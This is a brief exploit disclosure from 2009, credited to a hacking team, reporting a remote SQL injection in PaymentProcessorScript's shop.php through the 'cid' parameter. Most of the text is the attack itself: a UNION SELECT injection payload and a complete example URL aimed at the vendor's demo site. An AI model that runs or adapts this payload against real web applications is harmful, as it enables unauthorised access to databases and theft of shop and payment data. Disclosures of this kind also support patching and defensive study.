PaymentProcessorScript suffers from a remote SQL injection vulnerability.
9e3d18634be53c0dad7dabd37157ed7f59b26d38a59b30805da14f811c09d779
/*
PaymentProcessorScript (cid) Remote SQL Injection Vulnerability
Discovered by : MizoZ
Contact : mizoz@9.cn <mizozx@gmail.com>
Team : EvilWay
Date : July 29 2009
Greetings : Moudi , Zuka, All friends
*/
SQL Injection shop.php (GET : cid) :
[HOST]/[PATH]/shop.php?cid=[SQL CODE]
SQL CODE : -1+union+select+1,2,version()--
Ex :
http://paymentprocessorscript.net/demo/shop.htm?cid=-1+union+select+version()--